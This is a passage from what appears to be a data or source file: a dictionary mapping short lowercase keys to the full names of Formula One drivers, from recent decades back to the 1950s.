'Alexander Wurz',\r\n 'speed' : 'Scott Speed',\r\n 'albers' : 'Christijan Albers',\r\n 'markus_winkelhock' : 'Markus Winkelhock',\r\n 'yamamoto' : 'Sakon Yamamoto',\r\n 'michael_schumacher' : 'Michael Schumacher',\r\n 'montoya' : 'Juan Pablo Montoya',\r\n 'klien' : 'Christian Klien',\r\n 'monteiro' : 'Tiago Monteiro',\r\n 'ide' : 'Yuji Ide',\r\n 'villeneuve' : 'Jacques Villeneuve',\r\n 'montagny' : 'Franck Montagny',\r\n 'rosa' : 'Pedro de la Rosa',\r\n 'doornbos' : 'Robert Doornbos',\r\n 'karthikeyan' : 'Narain Karthikeyan',\r\n 'friesacher' : 'Patrick Friesacher',\r\n 'zonta' : 'Ricardo Zonta',\r\n 'pizzonia' : 'Antonio Pizzonia',\r\n 'matta' : 'Cristiano da Matta',\r\n 'panis' : 'Olivier Panis',\r\n 'pantano' : 'Giorgio Pantano',\r\n 'bruni' : 'Gianmaria Bruni',\r\n 'baumgartner' : 'Zsolt Baumgartner',\r\n 'gene' : 'Marc Gene',\r\n 'frentzen' : 'Heinz-Harald Frentzen',\r\n 'verstappen' : 'Jos Verstappen',\r\n 'wilson' : 'Justin Wilson',\r\n 'firman' : 'Ralph Firman',\r\n 'kiesa' : 'Nicolas Kiesa',\r\n 'burti' : 'Luciano Burti',\r\n 'alesi' : 'Jean Alesi',\r\n 'irvine' : 'Eddie Irvine',\r\n 'hakkinen' : 'Mika Hakkinen',\r\n 'marques' : 'Tarso Marques',\r\n 'bernoldi' : 'Enrique Bernoldi',\r\n 'mazzacane' : 'Gaston Mazzacane',\r\n 'enge' : 'Tomas Enge',\r\n 'yoong' : 'Alex Yoong',\r\n 'salo' : 'Mika Salo',\r\n 'diniz' : 'Pedro Diniz',\r\n 'herbert' : 'Johnny Herbert',\r\n 'mcnish' : 'Allan McNish',\r\n 'buemi' : 'Sebastien Buemi',\r\n 'takagi' : 'Toranosuke Takagi',\r\n 'badoer' : 'Luca Badoer',\r\n 'zanardi' : 'Alessandro Zanardi',\r\n 'damon_hill' : 'Damon Hill',\r\n 'sarrazin' : 'Stephane Sarrazin',\r\n 'rosset' : 'Ricardo Rosset',\r\n 'tuero' : 'Esteban Tuero',\r\n 'nakano' : 'Shinji Nakano',\r\n 'magnussen' : 'Jan Magnussen',\r\n 'berger' : 'Gerhard Berger',\r\n 'larini' : 'Nicola Larini',\r\n 'katayama' : 'Ukyo Katayama',\r\n 'sospiri' : 'Vincenzo Sospiri',\r\n 'morbidelli' : 'Gianni Morbidelli',\r\n 'fontana' : 'Norberto Fontana',\r\n 'lamy' : 'Pedro Lamy',\r\n 'brundle' : 'Martin Brundle',\r\n 'montermini' : 'Andrea Montermini',\r\n 'lavaggi' : 'Giovanni Lavaggi',\r\n 'blundell' : 'Mark Blundell',\r\n 'suzuki' : 'Aguri Suzuki',\r\n 'inoue' : 'Taki Inoue',\r\n 'moreno' : 'Roberto Moreno',\r\n 'wendlinger' : 'Karl Wendlinger',\r\n 'gachot' : 'Bertrand Gachot',\r\n 'schiattarella' : 'Domenico Schiattarella',\r\n 'martini' : 'Pierluigi Martini',\r\n 'mansell' : 'Nigel Mansell',\r\n 'boullion' : 'Jean-Christophe Boullion',\r\n 'papis' : 'Massimiliano Papis',\r\n 'deletraz' : 'Jean-Denis Deletraz',\r\n 'tarquini' : 'Gabriele Tarquini',\r\n 'comas' : 'erik Comas',\r\n 'brabham' : 'David Brabham',\r\n 'senna' : 'Ayrton Senna',\r\n 'bernard' : 'eric Bernard',\r\n 'fittipaldi' : 'Christian Fittipaldi',\r\n 'alboreto' : 'Michele Alboreto',\r\n 'beretta' : 'Olivier Beretta',\r\n 'ratzenberger' : 'Roland Ratzenberger',\r\n 'belmondo' : 'Paul Belmondo',\r\n 'lehto' : 'Jyrki Jarvilehto',\r\n 'cesaris' : 'Andrea de Cesaris',\r\n 'gounon' : 'Jean-Marc Gounon',\r\n 'alliot' : 'Philippe Alliot',\r\n 'adams' : 'Philippe Adams',\r\n 'dalmas' : 'Yannick Dalmas',\r\n 'noda' : 'Hideki Noda',\r\n 'lagorce' : 'Franck Lagorce',\r\n 'prost' : 'Alain Prost',\r\n 'warwick' : 'Derek Warwick',\r\n 'patrese' : 'Riccardo Patrese',\r\n 'barbazza' : 'Fabrizio Barbazza',\r\n 'andretti' : 'Michael Andretti',\r\n 'capelli' : 'Ivan Capelli',\r\n 'boutsen' : 'Thierry Boutsen',\r\n 'apicella' : 'Marco Apicella',\r\n 'naspetti' : 'Emanuele Naspetti',\r\n 'toshio_suzuki' : 'Toshio Suzuki',\r\n 'gugelmin' : 'Mauricio Gugelmin',\r\n 'poele' : 'Eric van de Poele',\r\n 'grouillard' : 'Olivier Grouillard',\r\n 'chiesa' : 'Andrea Chiesa',\r\n 'modena' : 'Stefano Modena',\r\n 'amati' : 'Giovanna Amati',\r\n 'caffi' : 'Alex Caffi',\r\n 'bertaggia' : 'Enrico Bertaggia',\r\n 'mccarthy' : 'Perry McCarthy',\r\n 'lammers' : 'Jan Lammers',\r\n 'piquet' : 'Nelson Piquet',\r\n 'satoru_nakajima' : 'Satoru Nakajima',\r\n 'pirro' : 'Emanuele Pirro',\r\n 'johansson' : 'Stefan Johansson',\r\n 'bailey' : 'Julian Bailey',\r\n 'chaves' : 'Pedro Chaves',\r\n 'bartels' : 'Michael Bartels',\r\n 'hattori' : 'Naoki Hattori',\r\n 'nannini' : 'Alessandro Nannini',\r\n 'schneider' : 'Bernd Schneider',\r\n 'barilla' : 'Paolo Barilla',\r\n 'foitek' : 'Gregor Foitek',\r\n 'langes' : 'Claudio Langes',\r\n 'gary_brabham' : 'Gary Brabham',\r\n 'donnelly' : 'Martin Donnelly',\r\n 'giacomelli' : 'Bruno Giacomelli',\r\n 'alguersuari' : 'Jaime Alguersuari',\r\n 'grosjean' : 'Romain Grosjean',\r\n 'kobayashi' : 'Kamui Kobayashi',\r\n 'palmer' : 'Jonathan Palmer',\r\n 'danner' : 'Christian Danner',\r\n 'cheever' : 'Eddie Cheever',\r\n 'sala' : 'Luis Perez-Sala',\r\n 'ghinzani' : 'Piercarlo Ghinzani',\r\n 'weidler' : 'Volker Weidler',\r\n 'raphanel' : 'Pierre-Henri Raphanel',\r\n 'arnoux' : 'Rene Arnoux',\r\n 'joachim_winkelhock' : 'Joachim Winkelhock',\r\n 'larrauri' : 'Oscar Larrauri',\r\n 'streiff' : 'Philippe Streiff',\r\n 'campos' : 'Adrian Campos',\r\n 'schlesser' : 'Jean-Louis Schlesser',\r\n 'fabre' : 'Pascal Fabre',\r\n 'fabi' : 'Teo Fabi',\r\n 'forini' : 'Franco Forini',\r\n 'laffite' : 'Jacques Laffite',\r\n 'angelis' : 'Elio de Angelis',\r\n 'dumfries' : 'Johnny Dumfries',\r\n 'tambay' : 'Patrick Tambay',\r\n 'surer' : 'Marc Surer',\r\n 'keke_rosberg' : 'Keke Rosberg',\r\n 'jones' : 'Alan Jones',\r\n 'rothengatter' : 'Huub Rothengatter',\r\n 'berg' : 'Allen Berg',\r\n 'manfred_winkelhock' : 'Manfred Winkelhock',\r\n 'lauda' : 'Niki Lauda',\r\n 'hesnault' : 'Francois Hesnault',\r\n 'baldi' : 'Mauro Baldi',\r\n 'bellof' : 'Stefan Bellof',\r\n 'acheson' : 'Kenny Acheson',\r\n 'watson' : 'John Watson',\r\n 'cecotto' : 'Johnny Cecotto',\r\n 'gartner' : 'Jo Gartner',\r\n 'corrado_fabi' : 'Corrado Fabi',\r\n 'thackwell' : 'Mike Thackwell',\r\n 'serra' : 'Chico Serra',\r\n 'sullivan' : 'Danny Sullivan',\r\n 'salazar' : 'Eliseo Salazar',\r\n 'guerrero' : 'Roberto Guerrero',\r\n 'boesel' : 'Raul Boesel',\r\n 'jarier' : 'Jean-Pierre Jarier',\r\n 'villeneuve_sr' : 'Jacques Villeneuve Sr.',\r\n 'reutemann' : 'Carlos Reutemann',\r\n 'mass' : 'Jochen Mass',\r\n 'borgudd' : 'Slim Borgudd',\r\n 'pironi' : 'Didier Pironi',\r\n 'gilles_villeneuve' : 'Gilles Villeneuve',\r\n 'paletti' : 'Riccardo Paletti',\r\n 'henton' : 'Brian Henton',\r\n 'daly' : 'Derek Daly',\r\n 'mario_andretti' : 'Mario Andretti',\r\n 'villota' : 'Emilio de Villota',\r\n 'lees' : 'Geoff Lees',\r\n 'byrne' : 'Tommy Byrne',\r\n 'keegan' : 'Rupert Keegan',\r\n 'rebaque' : 'Hector Rebaque',\r\n 'gabbiani' : 'Beppe Gabbiani',\r\n 'cogan' : 'Kevin Cogan',\r\n 'guerra' : 'Miguel Angel Guerra',\r\n 'stohr' : 'Siegfried Stohr',\r\n 'zunino' : 'Ricardo Zunino',\r\n 'londono' : 'Ricardo Londono',\r\n 'jabouille' : 'Jean-Pierre Jabouille',\r\n 'francia' : 'Giorgio Francia',\r\n 'depailler' : 'Patrick Depailler',\r\n 'scheckter' : 'Jody Scheckter',\r\n 'regazzoni' : 'Clay Regazzoni',\r\n 'emerson_fittipaldi' : 'Emerson Fittipaldi',\r\n 'kennedy' : 'Dave Kennedy',\r\n 'south' : 'Stephen South',\r\n 'needell' : 'Tiff Needell',\r\n 'desire_wilson' : 'Desire Wilson',\r\n 'ertl' : 'Harald Ertl',\r\n 'brambilla' : 'Vittorio Brambilla',\r\n 'hunt' : 'James Hunt',\r\n 'merzario' : 'Arturo Merzario',\r\n 'stuck' : 'Hans-Joachim Stuck',\r\n 'brancatelli' : 'Gianfranco Brancatelli',\r\n 'ickx' : 'Jacky Ickx',\r\n 'gaillard' : 'Patrick Gaillard',\r\n 'ribeiro' : 'Alex Ribeiro',\r\n 'peterson' : 'Ronnie Peterson',\r\n 'lunger' : 'Brett Lunger',\r\n 'ongais' : 'Danny Ongais',\r\n 'leoni' : 'Lamberto Leoni',\r\n 'galica' : 'Divina Galica',\r\n 'stommelen' : 'Rolf Stommelen',\r\n 'colombo' : 'Alberto Colombo',\r\n 'trimmer' : 'Tony Trimmer',\r\n 'binder' : 'Hans Binder',\r\n 'bleekemolen' : 'Michael Bleekemolen',\r\n 'gimax' : 'Carlo Franchi',\r\n 'rahal' : 'Bobby Rahal',\r\n 'pace' : 'Carlos Pace',\r\n 'ian_scheckter' : 'Ian Scheckter',\r\n 'pryce' : 'Tom Pryce',\r\n 'hoffmann' : 'Ingo Hoffmann',\r\n 'zorzi' : 'Renzo Zorzi',\r\n 'nilsson' : 'Gunnar Nilsson',\r\n 'perkins' : 'Larry Perkins',\r\n 'hayje' : 'Boy Lunger',\r\n 'neve' : 'Patrick Neve',\r\n 'purley' : 'David Purley',\r\n 'andersson' : 'Conny Andersson',\r\n 'dryver' : 'Bernard de Dryver',\r\n 'oliver' : 'Jackie Oliver',\r\n 'kozarowitzky' : 'Mikko Kozarowitzky',\r\n 'sutcliffe' : 'Andy Sutcliffe',\r\n 'edwards' : 'Guy Edwards',\r\n 'mcguire' : 'Brian McGuire',\r\n 'schuppan' : 'Vern Schuppan',\r\n 'heyer' : 'Hans Heyer',\r\n 'pilette' : 'Teddy Pilette',\r\n 'ashley' : 'Ian Ashley',\r\n 'kessel' : 'Loris Kessel',\r\n 'takahashi' : 'Kunimitsu Takahashi',\r\n 'hoshino' : 'Kazuyoshi Hoshino',\r\n 'takahara' : 'Noritake Takahara',\r\n 'lombardi' : 'Lella Lombardi',\r\n 'evans' : 'Bob Evans',\r\n 'leclere' : 'Michel Leclere',\r\n 'amon' : 'Chris Amon',\r\n 'zapico' : 'Emilio Zapico',\r\n 'pescarolo' : 'Henri Pescarolo',\r\n 'nelleman' : 'Jac Nelleman',\r\n 'magee' : 'Damien Magee',\r\n 'wilds' : 'Mike Wilds',\r\n 'pesenti_rossi' : 'Alessandro Pesenti-Rossi',\r\n 'stuppacher' : 'Otto Stuppacher',\r\n 'brown' : 'Warwick Brown',\r\n 'hasemi' : 'Masahiro Hasemi',\r\n 'donohue' : 'Mark Donohue',\r\n 'hill' : 'Graham Hill',\r\n 'wilson_fittipaldi' : 'Wilson Fittipaldi',\r\n 'tunmer' : 'Guy Tunmer',\r\n 'keizan' : 'Eddie Keizan',\r\n 'charlton' : 'Dave Charlton',\r\n 'brise' : 'Tony Brise',\r\n 'wunderink' : 'Roelof Wunderink',\r\n 'migault' : 'Francois Migault',\r\n 'palm' : 'Torsten Palm',\r\n 'lennep' : 'Gijs van Lennep',\r\n 'fushida' : 'Hiroshi Fushida',\r\n 'nicholson' : 'John Nicholson',\r\n 'morgan' : 'Dave Morgan',\r\n 'crawford' : 'Jim Crawford',\r\n 'vonlanthen' : 'Jo Vonlanthen',\r\n 'hulme' : 'Denny Hulme',\r\n 'hailwood' : 'Mike Hailwood',\r\n 'beltoise' : 'Jean-Pierre Beltoise',\r\n 'ganley' : 'Howden Ganley',\r\n 'robarts' : 'Richard Robarts',\r\n 'revson' : 'Peter Revson',\r\n 'driver' : 'Paddy Driver',\r\n 'belso' : 'Tom Belso',\r\n 'redman' : 'Brian Redman',\r\n 'opel' : 'Rikky von Opel',\r\n 'schenken' : 'Tim Schenken',\r\n 'larrousse' : 'Gerard Larrousse',\r\n 'kinnunen' : 'Leo Kinnunen',\r\n 'wisell' : 'Reine Wisell',\r\n 'roos' : 'Bertil Roos',\r\n 'dolhem' : 'Jose Dolhem',\r\n 'gethin' : 'Peter Gethin',\r\n 'bell' : 'Derek Bell',\r\n 'hobbs' : 'David Hobbs',\r\n 'quester' : 'Dieter Quester',\r\n 'koinigg' : 'Helmuth Koinigg',\r\n 'facetti' : 'Carlo Facetti',\r\n 'wietzes' : 'Eppie Wietzes',\r\n 'cevert' : 'Francois Cevert',\r\n 'stewart' : 'Jackie Stewart',\r\n 'beuttler' : 'Mike Beuttler',\r\n 'galli' : 'Nanni Galli',\r\n 'bueno' : 'Luiz Bueno',\r\n 'follmer' : 'George Follmer',\r\n 'adamich' : 'Andrea de Adamich',\r\n 'pretorius' : 'Jackie Pretorius',\r\n 'williamson' : 'Roger Williamson',\r\n 'mcrae' : 'Graham McRae',\r\n 'marko' : 'Helmut Marko',\r\n 'walker' : 'David Walker',\r\n 'roig' : 'Alex Soler-Roig',\r\n 'love' : 'John Love',\r\n 'surtees' : 'John Surtees',\r\n 'barber' : 'Skip Barber',\r\n 'brack' : 'Bill Brack',\r\n 'posey' : 'Sam Posey',\r\n 'rodriguez' : 'Pedro Rodriguez',\r\n 'siffert' : 'Jo Siffert',\r\n 'bonnier' : 'Jo Bonnier',\r\n 'mazet' : 'Francois Mazet',\r\n 'jean' : 'Max Jean',\r\n 'elford' : 'Vic Elford',\r\n 'moser' : 'Silvio Moser',\r\n 'eaton' : 'George Eaton',\r\n 'lovely' : 'Pete Lovely',\r\n 'craft' : 'Chris Craft',\r\n 'Cannoc' : 'John Cannon',\r\n 'jack_brabham' : 'Jack Brabham',\r\n 'miles' : 'John Miles',\r\n 'rindt' : 'Jochen Rindt',\r\n 'gavin' : 'Johnny Servoz-Gavin',\r\n 'mclaren' : 'Bruce McLaren',\r\n 'courage' : 'Piers Courage',\r\n 'klerk' : 'Peter de Klerk',\r\n 'giunti' : 'Ignazio Giunti',\r\n 'gurney' : 'Dan Gurney',\r\n 'hahne' : 'Hubert Hahne',\r\n 'hutchison' : 'Gus Hutchison',\r\n 'westbury' : 'Peter Westbury',\r\n 'tingle' : 'Sam Tingle',\r\n 'rooyen' : 'Basil van Rooyen',\r\n 'attwood' : 'Richard Attwood',\r\n 'pease' : 'Al Pease',\r\n 'cordts' : 'John Cordts',\r\n 'clark' : 'Jim Clark',\r\n 'spence' : 'Mike Spence',\r\n 'scarfiotti' : 'Ludovico Scarfiotti',\r\n 'bianchi' : 'Lucien Bianchi',\r\n 'jo_schlesser' : 'Jo Schlesser',\r\n 'widdows' : 'Robin Widdows',\r\n 'ahrens' : 'Kurt Ahrens',\r\n 'gardner' : 'Frank Gardner',\r\n 'unser' : 'Bobby Unser',\r\n 'solana' : 'Moises Solana',\r\n 'anderson' : 'Bob Anderson',\r\n 'botha' : 'Luki Botha',\r\n 'bandini' : 'Lorenzo Bandini',\r\n 'ginther' : 'Richie Ginther',\r\n 'parkes' : 'Mike Parkes',\r\n 'irwin' : 'Chris Irwin',\r\n 'ligier' : 'Guy Ligier',\r\n 'rees' : 'Alan Rees',\r\n 'hart' : 'Brian Hart',\r\n 'fisher' : 'Mike Fisher',\r\n 'tom_jones' : 'Tom Jones',\r\n 'baghetti' : 'Giancarlo Baghetti',\r\n 'williams' : 'Jonathan Williams',\r\n 'bondurant' : 'Bob Bondurant',\r\n 'arundell' : 'Peter Arundell',\r\n 'vic_wilson' : 'Vic Wilson',\r\n 'taylor' : 'John Taylor',\r\n 'lawrence' : 'Chris Lawrence',\r\n 'trevor_taylor' : 'Trevor Taylor',\r\n 'geki' : 'Giacomo Russo',\r\n 'phil_hill' : 'Phil Hill',\r\n 'ireland' : 'Innes Ireland',\r\n 'bucknum' : 'Ronnie Bucknum',\r\n 'hawkins' : 'Paul Hawkins',\r\n 'prophet' : 'David Prophet',\r\n 'maggs' : 'Tony Maggs',\r\n 'blokdyk' : 'Trevor Blokdyk',\r\n 'lederle' : 'Neville Lederle',\r\n 'serrurier' : 'Doug Serrurier',\r\n 'niemann' : 'Brausch Niemann',\r\n 'pieterse' : 'Ernie Pieterse',\r\n 'puzey' : 'Clive Puzey',\r\n 'reed' : 'Ray Reed',\r\n 'clapham' : 'David Clapham',\r\n 'blignaut' : 'Alex Blignaut',\r\n 'gregory' : 'Masten Gregory',\r\n 'rhodes' : 'John Rhodes',\r\n 'raby' : 'Ian Raby',\r\n 'rollinson' : 'Alan Rollinson',\r\n 'gubby' : 'Brian Gubby',\r\n 'mitter' : 'Gerhard Mitter',\r\n 'bussinello' : 'Roberto Bussinello',\r\n 'vaccarella' : 'Nino Vaccarella',\r\n 'bassi' : 'Giorgio Bassi',\r\n 'trintignant' : 'Maurice Trintignant',\r\n 'collomb' : 'Bernard Collomb',\r\n 'andre_pilette' : 'Andre Pilette',\r\n 'beaufort' : 'Carel Godin de Beaufort',\r\n 'barth' : 'Edgar Barth',\r\n 'cabral' : 'Mario de Araujo Cabral',\r\n 'hansgen' : 'Walt Hansgen',\r\n 'sharp' : 'Hap Sharp',\r\n 'mairesse' : 'Willy Mairesse',\r\n 'campbell-jones' : 'John Campbell-Jones',\r\n 'burgess' : 'Ian Burgess',\r\n 'settember' : 'Tony Settember',\r\n 'estefano' : 'Nasif Estefano',\r\n 'hall' : 'Jim Hall',\r\n 'parnell' : 'Tim Parnell',\r\n 'kuhnke' : 'Kurt Kuhnke',\r\n 'ernesto_brambilla' : 'Ernesto Brambilla',\r\n 'lippi' : 'Roberto Lippi',\r\n 'seiffert' : 'Gunther Seiffert',\r\n 'abate' : 'Carlo Abate',\r\n 'starrabba' : 'Gaetano Starrabba',\r\n 'broeker' : 'Peter Broeker',\r\n 'ward' : 'Rodger Ward',\r\n 'vos' : 'Ernie de Vos',\r\n 'dochnal' : 'Frank Dochnal',\r\n 'monarch' : 'Thomas Monarch',\r\n 'lewis' : 'Jackie Lewis',\r\n 'ricardo_rodriguez' : 'Ricardo Rodriguez',\r\n 'seidel' : 'Wolfgang Seidel',\r\n 'salvadori' : 'Roy Salvadori',\r\n 'pon' : 'Ben Pon',\r\n 'slotemaker' : 'Rob Slotemaker',\r\n 'marsh' : 'Tony Marsh',\r\n 'ashmore' : 'Gerry Ashmore',\r\n 'schiller' : 'Heinz Schiller',\r\n 'davis' : 'Colin Davis',\r\n 'chamberlain' : 'Jay Chamberlain',\r\n 'shelly' : 'Tony Shelly',\r\n 'greene' : 'Keith Greene',\r\n 'walter' : 'Heini Walter',\r\n 'prinoth' : 'Ernesto Prinoth',\r\n 'penske' : 'Roger Penske',\r\n 'schroeder' : 'Rob Schroeder',\r\n 'mayer' : 'Timmy Mayer',\r\n 'johnstone' : 'Bruce Johnstone',\r\n 'harris' : 'Mike Harris',\r\n 'hocking' : 'Gary Hocking',\r\n 'vyver' : 'Syd van der Vyver',\r\n 'moss' : 'Stirling Moss',\r\n 'trips' : 'Wolfgang von Trips',\r\n 'allison' : 'Cliff Allison',\r\n 'herrmann' : 'Hans Herrmann',\r\n 'brooks' : 'Tony Brooks',\r\n 'may' : 'Michael May',\r\n 'henry_taylor' : 'Henry Taylor',\r\n 'gendebien' : 'Olivier Gendebien',\r\n 'scarlatti' : 'Giorgio Scarlatti',\r\n 'naylor' : 'Brian Naylor',\r\n 'bordeu' : 'Juan Manuel Bordeu',\r\n 'fairman' : 'Jack Fairman',\r\n 'natili' : 'Massimo Natili',\r\n 'monteverdi' : 'Peter Monteverdi',\r\n 'pirocchi' : 'Renato Pirocchi',\r\n 'duke' : 'Geoff Duke',\r\n 'thiele' : 'Alfonso Thiele',\r\n 'boffa' : 'Menato Boffa',\r\n 'ryan' : 'Peter Ryan',\r\n 'ruby' : 'Lloyd Ruby',\r\n 'ken_miles' : 'Ken Miles',\r\n 'menditeguy' : 'Carlos Menditeguy',\r\n 'larreta' : 'Alberto Rodriguez Larreta',\r\n 'gonzalez' : 'Jose Froilan Gonzalez',\r\n 'bonomi' : 'Roberto Bonomi',\r\n 'munaron' : 'Gino Munaron',\r\n 'schell' : 'Harry Schell',\r\n 'stacey' : 'Alan Stacey',\r\n 'chimeri' : 'Ettore Chimeri',\r\n 'creus' : 'Antonio Creus',\r\n 'bristow' : 'Chris Bristow',\r\n 'halford' : 'Bruce Halford',\r\n 'daigh' : 'Chuck Daigh',\r\n 'reventlow' : 'Lance Reventlow',\r\n 'rathmann' : 'Jim Rathmann',\r\n 'goldsmith' : 'Paul Goldsmith',\r\n 'branson' : 'Don Branson',\r\n 'thomson' : 'Johnny Thomson',\r\n 'johnson' : 'Eddie Johnson',\r\n 'veith' : 'Bob Veith',\r\n 'tingelstad' : 'Bud Tingelstad',\r\n 'christie' : 'Bob Christie',\r\n 'amick' : 'Red Amick',\r\n 'darter' : 'Duane Carter',\r\n 'homeier' : 'Bill Homeier',\r\n 'hartley' : 'Gene Hartley',\r\n 'stevenson' : 'Chuck Stevenson',\r\n 'grim' : 'Bobby Grim',\r\n 'templeman' : 'Shorty Templeman',\r\n 'hurtubise' : 'Jim Hurtubise',\r\n 'bryan' : 'Jimmy Bryan',\r\n 'ruttman' : 'Troy Ruttman',\r\n 'sachs' : 'Eddie Sachs',\r\n 'freeland' : 'Don Freeland',\r\n 'bettenhausen' : 'Tony Bettenhausen',\r\n 'weiler' : 'Wayne Weiler',\r\n 'foyt' : 'Anthony Foyt',\r\n 'russo' : 'Eddie Russo',\r\n 'boyd' : 'Johnny Boyd',\r\n 'force' : 'Gene Force',\r\n 'mcwithey' : 'Jim McWithey',\r\n 'sutton' : 'Len Sutton',\r\n 'dick_rathmann' : 'Dick Rathmann',\r\n 'herman' : 'Al Herman',\r\n 'dempsey_wilson' : 'Dempsey Wilson',\r\n 'mike_taylor' : 'Mike Taylor',\r\n 'flockhart' : 'Ron Flockhart',\r\n 'piper' : 'David Piper',\r\n 'cabianca' : 'Giulio Cabianca',\r\n 'drogo' : 'Piero Drogo',\r\n 'gamble' : 'Fred Gamble',\r\n 'owen' : 'Arthur Owen',\r\n 'gould' : 'Horace Gould',\r\n 'drake' : 'Bob Drake',\r\n 'bueb' : 'Ivor Bueb',\r\n 'Changy' : 'Alain de Changy',\r\n 'filippis' : 'Maria de Filippis',\r\n 'lucienbonnet' : 'Jean Lucienbonnet',\r\n 'testut' : 'Andre Testut',\r\n 'behra' : 'Jean Behra',\r\n 'paul_russo' : 'Paul Russo',\r\n 'daywalt' : 'Jimmy Daywalt',\r\n 'arnold' : 'Chuck Arnold',\r\n 'keller' : 'Al Keller',\r\n 'flaherty' : 'Pat Flaherty',\r\n 'cheesbourg' : 'Bill Cheesbourg',\r\n 'ray_crawford' : 'Ray Crawford',\r\n 'turner' : 'Jack Turner',\r\n 'weyant' : 'Chuck Weyant',\r\n 'larson' : 'Jud Larson',\r\n 'magill' : 'Mike Magill',\r\n 'shelby' : 'Carroll Shelby',\r\n 'orey' : 'Fritz d\\'Orey',\r\n 'fontes' : 'Azdrubal Fontes',\r\n 'ashdown' : 'Peter Ashdown',\r\n 'bill_moss' : 'Bill Moss',\r\n 'dennis_taylor' : 'Dennis Taylor',\r\n 'blanchard' : 'Harry Blanchard',\r\n 'tomaso' : 'Alessandro de Tomaso',\r\n 'constantine' : 'George Constantine',\r\n 'said' : 'Bob Said',\r\n 'cade' : 'Phil Cade',\r\n 'musso' : 'Luigi Musso',\r\n 'hawthorn' : 'Mike Hawthorn',\r\n 'fangio' : 'Juan Fangio',\r\n 'godia' : 'Paco Godia',\r\n 'collins' : 'Peter Collins',\r\n 'kavanagh' : 'Ken Kavanagh',\r\n 'gerini' : 'Gerino Gerini',\r\n 'kessler' : 'Bruce Kessler',\r\n 'emery' : 'Paul Emery',\r\n 'piotti' : 'Luigi Piotti',\r\n 'ecclestone' : 'Bernie Ecclestone',\r\n 'taramazzo' : 'Luigi Taramazzo',\r\n 'chiron' : 'Louis Chiron',\r\n 'lewis-evans' : 'Stuart Lewis-Evans',\r\n 'george_amick' : 'George Amick',\r\n 'reece' : 'Jimmy Reece',\r\n 'parsons' : 'Johnnie Parsons',\r\n 'tolan' : 'Johnnie Tolan',\r\n 'garrett' : 'Billy Garrett',\r\n 'elisian' : 'Ed Elisian',\r\n 'connor' : 'Pat O\\'Connor',\r\n 'jerry_unser' : 'Jerry Unser',\r\n 'bisch' : 'Art Bisch',\r\n 'goethals' : 'Christian Goethals',\r\n 'gibson' : 'Dick Gibson',\r\n 'la_caze' : 'Robert La Caze',\r\n 'guelfi' : 'Andre Guelfi',\r\n 'picard' : 'Francois Picard',\r\n 'bridger' : 'Tom Bridger',\r\n 'portago' : 'Alfonso de Portago',\r\n 'perdisa' : 'Cesare Perdisa',\r\n 'castellotti' : 'Eugenio Castellotti',\r\n 'simon' : 'Andre Simon',\r\n 'leston' : 'Les Leston',\r\n 'hanks' : 'Sam Hanks',\r\n 'linden' : 'Andy Linden',\r\n 'teague' : 'Marshall Teague',\r\n 'edmunds' : 'Don Edmunds',\r\n 'agabashian' : 'Fred Agabashian',\r\n 'george' : 'Elmer George',\r\n 'macdowel' : 'Mike MacDowel',\r\n 'mackay-fraser' : 'Herbert MacKay-Fraser',\r\n 'gerard' : 'Bob Gerard',\r\n 'maglioli' : 'Umberto Maglioli',\r\n 'england' : 'Paul England',\r\n 'landi' : 'Chico Landi',\r\n 'uria' : 'Alberto Uria',\r\n 'ramos' : 'Hernando da Silva Ramos',\r\n 'bayol' : 'Elie Bayol',\r\n 'manzon' : 'Robert Manzon',\r\n 'rosier' : 'Louis Rosier',\r\n 'sweikert' : 'Bob Sweikert',\r\n 'griffith' : 'Cliff Griffith',\r\n 'dinsmore' : 'Duke Dinsmore',\r\n 'andrews' : 'Keith Andrews',\r\n 'frere' : 'Paul Frere',\r\n 'villoresi' : 'Luigi Villoresi',\r\n 'scotti' : 'Piero Scotti',\r\n 'chapman' : 'Colin Chapman',\r\n 'titterington' : 'Desmond Titterington',\r\n 'scott_Brown' : 'Archie Scott Brown',\r\n 'volonterio' : 'Ottorino Volonterio',\r\n 'milhoux' : 'Andre Milhoux',\r\n 'graffenried' : 'Toulo de Graffenried',\r\n 'taruffi' : 'Piero Taruffi',\r\n 'farina' : 'Nino Farina',\r\n 'mieres' : 'Roberto Mieres',\r\n 'mantovani' : 'Sergio Mantovani',\r\n 'bucci' : 'Clemar Bucci',\r\n 'iglesias' : 'Jesus Iglesias',\r\n 'ascari' : 'Alberto Ascari',\r\n 'kling' : 'Karl Kling',\r\n 'birger' : 'Pablo Birger',\r\n 'pollet' : 'Jacques Pollet',\r\n 'macklin' : 'Lance Macklin',\r\n 'whiteaway' : 'Ted Whiteaway',\r\n 'davies' : 'Jimmy Davies',\r\n 'faulkner' : 'Walt Faulkner',\r\n 'niday' : 'Cal Niday',\r\n 'cross' : 'Art Cross',\r\n 'vukovich' : 'Bill Vukovich',\r\n 'mcgrath' : 'Jack McGrath',\r\n 'hoyt' : 'Jerry Hoyt',\r\n 'claes' : 'Johnny Claes',\r\n 'peter_walker' : 'Peter Walker',\r\n 'sparken' : 'Mike Sparken',\r\n 'wharton' : 'Ken Wharton',\r\n 'mcalpine' : 'Kenneth McAlpine',\r\n 'marr' : 'Leslie Marr',\r\n 'rolt' : 'Tony Rolt',\r\n 'fitch' : 'John Fitch',\r\n 'lucas' : 'Jean Lucas',\r\n 'bira' : 'Prince Bira',\r\n 'marimon' : 'Onofre Marimon',\r\n 'loyer' : 'Roger Loyer',\r\n 'daponte' : 'Jorge Daponte',\r\n 'nazaruk' : 'Mike Nazaruk',\r\n 'crockett' : 'Larry Crockett',\r\n 'ayulo' : 'Manny Ayulo',\r\n 'armi' : 'Frank Armi',\r\n 'webb' : 'Travis Webb',\r\n 'duncan' : 'Len Duncan',\r\n 'mccoy' : 'Ernie McCoy',\r\n 'swaters' : 'Jacques Swaters',\r\n 'georges_berger' : 'Georges Berger',\r\n 'beauman' : 'Don Beauman',\r\n 'thorne' : 'Leslie Thorne',\r\n 'whitehouse' : 'Bill Whitehouse',\r\n 'riseley_prichard' : 'John Riseley-Prichard',\r\n 'reg_parnell' : 'Reg Parnell',\r\n 'whitehead' : 'Peter Whitehead',\r\n 'brandon' : 'Eric Brandon',\r\n 'alan_brown' : 'Alan Brown',\r\n 'nuckey' : 'Rodney Nuckey',\r\n 'lang' : 'Hermann Lang',\r\n 'helfrich' : 'Theo Helfrich',\r\n 'wacker' : 'Fred Wacker',\r\n 'riu' : 'Giovanni de Riu',\r\n 'galvez' : 'Oscar Galvez',\r\n 'john_barber' : 'John Barber',\r\n 'bonetto' : 'Felice 